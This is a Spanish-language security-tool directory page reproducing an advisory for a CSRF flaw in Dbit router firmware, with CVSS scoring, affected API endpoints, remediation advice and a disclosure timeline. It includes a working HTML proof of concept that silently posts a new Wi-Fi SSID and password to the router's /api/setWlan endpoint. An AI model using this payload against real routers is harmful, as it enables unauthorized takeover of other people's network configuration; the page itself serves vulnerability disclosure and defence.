Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2026-36956 — Prueba de concepto para CVE-2026-36956, una vulnerabilidad CSRF en el firmware del router Dbit que permite cambios de configuración no autorizados mediante solicitudes falsificadas. | Kitploit
Herramientas/GitHubGitHub/kirubel-cve/cve-2026-36956
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebSeguridad WebPruebas de Penetración
GitHubkirubel-cve/cve-2026-36956

CVE-2026-36956

Prueba de concepto para CVE-2026-36956, una vulnerabilidad CSRF en el firmware del router Dbit que permite cambios de configuración no autorizados mediante solicitudes falsificadas.

Ver Repositorio
hace 3 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2026-36956: Cross-Site Request Forgery (CSRF) en la Interfaz de Administración Web

ID CVE: CVE-2026-36956 Fecha: 2026-04-29 Descubridor: Kirubel Solomne Proveedor: Shenzhen Dibit Network Equipment Co., Ltd. Producto: Dbit Router Versión de Firmware: V1.0.0 CWE: CWE-352 - Cross-Site Request Forgery (CSRF)


Descripción

El firmware V1.0.0 del Dbit Router no implementa mecanismos de protección CSRF, como tokens anti-CSRF o validación estricta de los encabezados Origin/Referer en los endpoints de la API administrativa. Un atacante puede crear una página web maliciosa que envíe solicitudes HTTP falsificadas a los endpoints de configuración. Si un administrador autenticado visita la página maliciosa, el router procesa la solicitud falsificada como una acción administrativa legítima.


Puntuación CVSS

Puntuación CVSS v3.1: 8.8 (Alta) CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

MétricaValor
Vector de ataqueRed
Complejidad del ataqueBaja
Privilegios requeridosNinguno
Interacción del usuarioRequerida
Impacto en la confidencialidadAlto
Impacto en la integridadAlto
Impacto en la disponibilidadAlto

Endpoints Afectados

EndpointFunción
/api/setWlanConfiguración de red inalámbrica (SSID, contraseña)
/api/setWanConfiguración WAN
/api/setSystemConfiguración del sistema

Prueba de Concepto

Guarde lo siguiente como poc.html y ábralo mientras un administrador tiene la sesión iniciada en el router:

root@kitploit:~
<!DOCTYPE html>
<html>
<body>
<script>
  fetch('http://192.168.10.1/api/setWlan', {
    method: 'POST',
    credentials: 'include',
    headers: { 'Content-Type': 'application/json' },
    body: JSON.stringify({
      ssid: "Hacked_Network",
      password: "attacker123"
    })
  });
</script>
</body>
</html>

Comportamiento esperado: La solicitud debería rechazarse debido a una discrepancia en el token CSRF. Comportamiento real: El router acepta y procesa la solicitud falsificada.


Impacto

  • Modificación no autorizada del SSID y la contraseña del WiFi
  • Cambios en la configuración WAN/DNS
  • Denegación de servicio para usuarios legítimos
  • Toma de control total de la configuración del router

Remediación

  • Implementar tokens anti-CSRF en todos los endpoints que modifican el estado
  • Aplicar una validación estricta de los encabezados Origin y Referer
  • Usar el atributo SameSite=Strict en las cookies de sesión

Cronología de Divulgación

FechaEvento
2026-04-29Vulnerabilidad descubierta
2026-04-29Reportada a MITRE
2026-04-29CVE-2026-36956 asignado
2026-04-29Divulgación pública

Referencias

  • MITRE CVE-2026-36956
  • CWE-352
  • Sitio web del proveedor
Descargar herramienta